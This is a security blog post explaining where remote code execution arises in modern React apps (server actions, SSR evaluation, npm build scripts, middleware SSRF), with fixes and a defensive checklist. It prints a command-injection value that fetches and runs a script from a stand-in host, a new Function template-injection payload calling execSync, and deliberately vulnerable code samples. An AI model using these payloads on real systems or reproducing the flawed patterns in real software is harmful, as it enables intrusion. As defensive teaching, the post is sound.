vulnerabilities
12 min read · April 28, 2026

RCE in React Apps: It's Not Where You Think

Browsers sandbox your React code, so RCE is impossible — right? Wrong. The remote code execution in modern React apps lives in places most developers never look: server actions, build pipelines, and the npm tree underneath your bundler.

Every few months a developer sends me the same message: "I ran a security scan on my React app and it flagged a possible RCE. Is that even a thing?" The honest answer is yes, it's a thing — just not where the scanner is looking. The browser is a sandbox. `document.createElement` will not summon a shell. If your React code runs entirely in a tab on someone else's machine, the worst a typo can do is XSS, and XSS is bad, but it isn't remote code execution in the classical sense.

The reason RCE keeps showing up in modern React projects isn't because React itself grew teeth. It's because "a React app" stopped meaning "a static bundle served from a CDN" several years ago. A 2026-vintage React app is a server action endpoint, an SSR runtime, an image optimizer, a middleware function, a build pipeline, and a tree of 1,400 transitive npm dependencies — most of which can execute arbitrary Node.js code somewhere in your stack. That's where the remote code execution lives.

This is a tour of the four places it actually shows up.

The Browser Is Not Where the Bodies Are Buried

Before we go anywhere else, let's settle the easy part. Pure client-side React, executing in a browser tab, does not give an attacker code execution on your server or your user's machine. The browser sandbox is real. JavaScript inside a tab can read what the tab can read, send what the tab can send, and that's the boundary.

What people often confuse for "React RCE" is one of these:

  • `dangerouslySetInnerHTML` accepting unsanitized user input — that's a stored or reflected XSS, not RCE. Worth fixing immediately, but it's a different bug.
  • A markdown renderer that allows raw HTML — same category, same severity bracket.
  • Hydration mismatches where SSR produces different HTML than the client expects — generally a correctness bug, occasionally an XSS escalation, almost never RCE.

If your scanner flagged `dangerouslySetInnerHTML` and called it RCE, your scanner is wrong about the taxonomy. Fix it anyway, because it's still XSS. But the actual RCE attack surface in a modern React app sits one layer deeper.

Where It Actually Lives, #1: Server Actions

Server Components and Server Actions changed the architecture. A "React app" now routinely contains functions that look like client code, are imported into client components, and silently execute on the server with full Node.js privileges.

```tsx
'use server';

import { exec } from 'node:child_process';
import { promisify } from 'node:util';

const execAsync = promisify(exec);

export async function runReport(filter: string) {
  // This runs on the server, with whatever permissions the Node process has.
  const { stdout } = await execAsync(`./bin/report --filter=${filter}`);
  return stdout;
}
```

The `'use server'` directive at the top of the file means this is a callable RPC endpoint exposed to any client that knows how to invoke it. The shape of the bug is exactly the same as it was 25 years ago in CGI scripts: untrusted input concatenated into a shell command. The interpolation is the vulnerability. An attacker doesn't need to do anything fancy — passing `x; curl evil.example/payload.sh | sh` as the filter value works on the same principle that worked against `os.system` in 2003.

The server action wrapper makes this worse, not better, in two ways.

First, the boundary is invisible. To a developer reading the file, `runReport` looks like every other function in the codebase. Treating untrusted input as trusted is much easier to do when there's no syntactic signal that the input is untrusted.

Second, server actions accept arbitrary serialized payloads from the client. The framework deserializes the arguments and calls your function. If your function signature says `filter: string`, the framework will hand you a string — but it won't do anything to validate the contents of that string. Type safety at the function boundary is not input sanitization at the security boundary.

The fix is unglamorous: never pass user input to `exec`, `execSync`, or `spawn` with `shell: true`, or any equivalent. Use `spawn` with an argument array (`spawn('./bin/report', ['--filter', filter])`), and validate the input against a strict allowlist before it gets anywhere near a subprocess.
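A minimal sketch of that shape, reusing the `./bin/report` binary from the earlier snippet. The token-style filter format is an assumption; adjust the allowlist to whatever your filters actually look like:

```typescript
import { spawn } from "node:child_process";

// Assumed filter format: short alphanumeric tokens like "2024-q1".
const FILTER_RE = /^[A-Za-z0-9_-]{1,32}$/;

export function isValidFilter(filter: string): boolean {
  return FILTER_RE.test(filter);
}

export function runReportSafely(filter: string): Promise<string> {
  if (!isValidFilter(filter)) {
    return Promise.reject(new Error("invalid filter"));
  }
  return new Promise((resolve, reject) => {
    // Argument array, no shell: the filter arrives as one argv entry and is
    // never parsed by /bin/sh, so `;`, `|`, and backticks are inert text.
    const child = spawn("./bin/report", ["--filter", filter]);
    let out = "";
    child.stdout.on("data", (chunk) => { out += chunk; });
    child.on("error", reject);
    child.on("close", (code) =>
      code === 0 ? resolve(out) : reject(new Error(`report exited ${code}`))
    );
  });
}
```

Note that the allowlist runs before `spawn` is ever reached; the argument array is the second line of defense, not the first.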

Where It Actually Lives, #2: The SSR Render Path

Server-side rendering means React is producing HTML in a Node process. Anything that touches that render path with user input is a potential entry point.

The classic example is a custom template helper that accepts user-controlled HTML and feeds it into something that resembles `eval` more than it should:

```tsx
function renderUserBio(bio: string) {
  // Looks innocent. Is not.
  return new Function('return `' + bio + '`')();
}
```

The author probably wanted template-literal interpolation. What they got was `new Function` constructing a function from a string that contains user input. A bio of `${process.mainModule.require('child_process').execSync('id')}` runs the `id` command inside the render process on the next render; swap `id` for any other command and the attacker has a shell on your server. This is RCE in the textbook sense.

This pattern is rare in idiomatic React, but it appears all the time in custom theming systems, "user-defined" widgets, and templating layers built on top of React. Anywhere a developer reaches for `Function`, `eval`, `vm.runInNewContext`, or a third-party expression evaluator, ask: does any user input reach this? If yes, the answer is to redesign — there is no safe way to evaluate untrusted JavaScript in the same process as your server.
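If all the helper actually needed was variable substitution, a fixed placeholder syntax gets the same effect with no evaluation at all. A sketch, using a hypothetical `{{name}}` syntax:

```typescript
// Replaces {{key}} placeholders from an explicit map of known values.
// User input is only ever copied into the output, never evaluated, so
// `${...}` sequences in a bio are rendered as literal text.
export function renderTemplate(
  template: string,
  vars: Record<string, string>
): string {
  return template.replace(/\{\{(\w+)\}\}/g, (_m: string, key: string) =>
    Object.prototype.hasOwnProperty.call(vars, key) ? vars[key] : ""
  );
}
```

The design point: the set of substitutable values is closed and chosen by your code, so there is nothing for an attacker's string to escape into.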

A subtler variant is server-side template injection through markdown or MDX. MDX in particular lets authors embed JSX, which means an MDX file authored by an untrusted user is, by design, executable React code. If your CMS lets users upload MDX, your CMS lets users execute code on your render server. The fix is either strict MDX (a profile that disables JS evaluation) or accepting only plain markdown.

Where It Actually Lives, #3: The Build Pipeline

This is the category most people miss because it doesn't feel like part of the app.

When you run `npm install`, every package in your dependency tree has the opportunity to execute its `postinstall` script. That script runs with the privileges of whatever account ran `npm install` — usually a developer's laptop, your CI runner, or your deploy target. There is no sandbox. The script can do anything the user can do.

In 2024, an academic study counted around 1,400 transitive dependencies in a freshly scaffolded Next.js project. Each of those packages could, in principle, ship malicious code in a future minor version, and your lockfile only protects you until you bump. This isn't theoretical: `event-stream`, `ua-parser-js`, `coa`, `rc`, and a steady drumbeat of typosquatted packages have all delivered malware through exactly this channel.

Build-time RCE doesn't even need a postinstall script. Webpack and Vite plugins execute Node code during the build itself. A malicious or compromised plugin can read environment variables (CI secrets, deploy tokens, AWS credentials), inject backdoor code into the production bundle, or stage a payload that fires only when the build runs in a CI environment matching certain heuristics.

The defenses here are all unsexy:

  • `npm install --ignore-scripts` plus selective allowlisting of packages that genuinely need install scripts.
  • Lockfile-pinned, integrity-hashed dependencies — never `^1.0.0` for security-critical packages.
  • A separate, isolated build environment with no production credentials present at build time.
  • Tooling like Socket, Snyk, or npm audit running on every PR — not as a gate, but as a signal you read.

The pattern to internalize: your build pipeline is a privileged environment that runs untrusted code on every install. Treat it accordingly.
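Wired into configuration, the first two defenses look roughly like this for npm (pnpm and yarn have equivalent settings; the comments are mine, not npm's):

```ini
; .npmrc — checked into the repo so laptops and CI behave the same
ignore-scripts=true

; record exact versions instead of ^ ranges when adding dependencies
save-exact=true
```

Packages that genuinely need their install scripts (native addons, mostly) can then be handled explicitly, for example with a documented `npm rebuild <pkg>` step, rather than letting all 1,400 packages run code by default.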

Where It Actually Lives, #4: Middleware and Edge Functions

React frameworks lean heavily on middleware — small functions that run on every request, often at the edge, often with access to environment variables and outbound network. They're a beautiful target.

The bugs cluster in two places.

Header injection into outbound requests. Middleware that forwards an inbound header to an outbound API call without validation is a Server-Side Request Forgery vulnerability waiting to happen. SSRF isn't always RCE, but in cloud environments it often is — the attacker uses the SSRF to read instance metadata, exfiltrate IAM credentials, and pivot from there.

```tsx
import { NextRequest } from 'next/server';

export async function middleware(req: NextRequest) {
  const target = req.headers.get('x-internal-target');
  // Attacker controls 'target'. Now we make a server-side request to wherever they say.
  return fetch(`https://api.internal/${target}`);
}
```
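The defensive shape is an exact-match allowlist on the forwarded value, checked before any outbound request is made. A sketch; the header name and the set of allowed targets are assumptions:

```typescript
// Hypothetical set of internal API routes the middleware may proxy to.
const ALLOWED_TARGETS = new Set(["reports", "status", "metrics"]);

// Returns the target only if it is an exact allowlisted token: no slashes,
// no "..", no absolute URLs, so the header cannot steer the outbound fetch.
export function resolveTarget(header: string | null): string | null {
  if (header !== null && ALLOWED_TARGETS.has(header)) return header;
  return null;
}
```

In the middleware itself, a `null` result should become a 403 response; the `fetch` only ever sees a string your own code enumerated.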

Pattern compilation from user input. Some middleware compiles regexes or path patterns from request data. `new RegExp(userInput)` is not RCE on its own (it's a ReDoS vector), but `pathToRegexp` and similar libraries have shipped CVEs where pattern compilation could be coerced into executing code under specific configurations. The general principle: if a library compiles user input into something that gets executed, audit that library carefully and pin its version.

Edge runtimes (Cloudflare Workers, Vercel Edge, Deno Deploy) reduce the blast radius — they're sandboxed and don't have full Node APIs. But they do have outbound network and they do have access to bound secrets, so SSRF and credential leakage remain in scope even when classical RCE doesn't.

A Defensive Checklist That Actually Helps

Most security checklists for React apps spend their first ten items on `dangerouslySetInnerHTML` and end before they reach the actual attack surface. Reverse the order.

  1. Audit every `'use server'` file and every API route handler. Trace user input from entry point to every `exec`, `spawn`, file-system, or database call. Concatenation into shell strings is RCE; argument arrays are not.
  2. Grep your codebase for `new Function`, `eval`, `vm.runIn`, and any expression evaluator library. Each occurrence needs an explicit answer to "can user input reach this?"
  3. If you accept user-authored content that is rendered server-side, ban MDX and JSX-in-content. Plain markdown only, with an HTML sanitizer on the output.
  4. Run builds with `--ignore-scripts` by default. Keep an explicit allowlist of packages that need postinstall scripts and review additions to that list.
  5. Builds should not have production credentials. CI deploy steps should — and those steps should run after the build artifact is hashed and signed.
  6. Middleware that forwards request data to outbound calls is high-risk. Validate the destination, validate the headers, prefer allowlists over denylists.
  7. Pin and integrity-check security-critical dependencies. Subscribe to advisories for the frameworks you use (Next.js, Remix, React Router, your bundler).
  8. Yes, also fix `dangerouslySetInnerHTML` and prevent XSS. It's just not the headline.

The Honest Summary

The phrase "RCE in React" is technically a category error. React doesn't execute remote code; the runtime around React executes code, and modern React apps come with a lot of runtime. The browser tab is not where the threat lives. The threat lives in the server action you forgot was an RPC endpoint, the SSR helper that reaches for `new Function`, the postinstall script in a transitive dependency you never audited, and the middleware function that trusts an inbound header. Each of these is fixable. Each of these is missed by every security tool that treats "React" as synonymous with "browser."

The best mental model is to stop thinking of a React project as a frontend and start thinking of it as a distributed system whose frontend happens to be React. Once you've made that shift, the question is no longer "can my React app have RCE" — it's "where does my React app run untrusted-influenced code, and what's protecting each of those execution boundaries?" That question has answers. The first one didn't.
